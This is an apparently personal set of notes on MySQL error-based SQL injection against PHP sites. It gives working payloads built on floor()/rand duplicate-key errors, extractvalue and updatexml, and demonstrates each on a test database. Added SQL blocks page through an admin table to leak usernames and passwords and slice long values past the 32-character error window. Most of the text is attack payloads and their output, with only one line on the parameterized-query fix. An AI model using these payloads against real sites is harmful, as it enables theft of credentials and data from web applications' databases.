Some of my old notes. When MySQL fails to execute a statement it raises an error message, and PHP+MySQL sites often print that error text straight onto the page, so specific data can be pulled out of the error with the three techniques below.
Actual test environment:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+
mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+
mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Errors via floor()
The following payloads can be used (both need the injected expression to return exactly one row, and the derived table must supply at least three rows for the duplicate key to appear):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)))
Example:
First run the normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement forces the error:
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
The MySQL version has been leaked through the duplicate-key error. To read other data, replace version() with the expression you want to extract (it must evaluate to a single value, so use a subquery with LIMIT 1 or a WHERE clause that matches one row).
For example, to get the administrator's username and password:
Method 1:
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:
mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Note that the trailing 1 in 'admin8881' is the floor(rand(0)*2) bit that concat() appended, not part of the password; the password itself is admin888, as the extractvalue output further down confirms. Putting a separator such as '~' between the data and the floor() bit avoids the ambiguity.
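Why the floor() payload works and how to page through a whole table with it, as an added example that is not part of the original notes. It assumes the same `test` database described above (admin with id/user/pass) and a stock MySQL server; the 0, 1, 1 prefix of floor(rand(0)*2) is the well-known output of the seeded generator, and the '~' separator is my choice to keep the data visually separate from the floor() bit.

```sql
-- Added example (not from the original notes); assumes the `test` database above.

-- 1. rand(0) is seeded, so floor(rand(0)*2) yields the same stream on every run,
--    beginning 0, 1, 1.  GROUP BY evaluates the key expression once to look it up
--    in its temporary table and again when it inserts a missing key:
--      row 1: lookup computes 0 (miss), insert stores 1
--      row 2: lookup computes 1 (hit), count is bumped
--      row 3: lookup computes 0 (miss), insert stores 1 -> Duplicate entry
select floor(rand(0)*2) as b from information_schema.tables limit 3;

-- 2. So the derived table must supply at least three rows.  Two rows do not error:
select count(*) from (select 1 union select 2) x
  group by concat('a', floor(rand(0)*2));
-- three rows do (ERROR 1062, Duplicate entry 'a1' for key 'group_key'):
select count(*) from (select 1 union select 2 union select 3) x
  group by concat('a', floor(rand(0)*2));

-- 3. Count the target rows first so you know when to stop paging.
select * from article where id = 1 and (select 1 from (
  select count(*), concat((select count(*) from admin), '~', floor(rand(0)*2)) x
  from information_schema.tables group by x) a);

-- 4. Dump the admin table one row per request by bumping the offset in LIMIT n,1.
--    The inner subquery must return exactly one row: without the LIMIT MySQL
--    raises "Subquery returns more than 1 row" instead of the duplicate-entry
--    error, and nothing is leaked.
select * from article where id = 1 and (select 1 from (
  select count(*), concat(
    (select concat(user, ':', pass) from admin order by id limit 0,1),
    '~', floor(rand(0)*2)) x
  from information_schema.tables group by x) a);

select * from article where id = 1 and (select 1 from (
  select count(*), concat(
    (select concat(user, ':', pass) from admin order by id limit 1,1),
    '~', floor(rand(0)*2)) x
  from information_schema.tables group by x) a);
```

The leaked value appears between the opening quote of the Duplicate entry message and the '~'; everything after the '~' is the floor() bit. The application-side fix is the usual one: parameterized queries, and never echo the database error to the client.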
2. ExtractValue
Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))
Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test payload:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
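The two XPath-based techniques (ExtractValue in section 2 and UpdateXml in section 3) share one limitation that the outputs above do not show: the XPATH syntax error message echoes at most 32 characters of the bad expression. The following added example, which is not part of the original notes, shows how to pull longer values through that window with substr(); it assumes the same `test` database, and the '~' (0x7e) delimiter and the group_concat() usage are my additions.

```sql
-- Added example (not from the original notes); assumes the `test` database above.

-- 1. The error only echoes the first 32 characters of the offending XPath, and the
--    leading delimiter costs one of them.  The delimiter matters for another
--    reason: a value that happens to be a valid XPath (a bare number, a plain
--    name) raises no error at all, so always prefix a character that can never
--    start an XPath expression, such as '~' (0x7e).
select * from article where id = 1
  and extractvalue(1, concat(0x7e, (select group_concat(user, ':', pass) from admin)));

-- 2. Anything longer than 31 characters is cut off, so read it in 31-character
--    slices by moving the substr() start position: 1, 32, 63, ...  The list of
--    tables in the current schema is a typical value that overflows the window.
select * from article where id = 1
  and updatexml(1, concat(0x7e, substr(
        (select group_concat(table_name) from information_schema.tables
          where table_schema = database()), 1, 31)), 1);

select * from article where id = 1
  and updatexml(1, concat(0x7e, substr(
        (select group_concat(table_name) from information_schema.tables
          where table_schema = database()), 32, 31)), 1);

-- 3. Knowing the total length up front tells you how many slices to request.
select * from article where id = 1
  and updatexml(1, concat(0x7e,
        (select length(group_concat(table_name)) from information_schema.tables
          where table_schema = database())), 1);
```

extractvalue() and updatexml() are interchangeable here; both fail while parsing the XPath argument, before any XML is touched, so the second argument is the only thing that matters. group_concat() lets one request carry several rows, which is usually faster than the one-row-per-request paging needed with the floor() method, as long as the result is then sliced to fit the 32-character window.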
That's all, thanks to the foreign guys.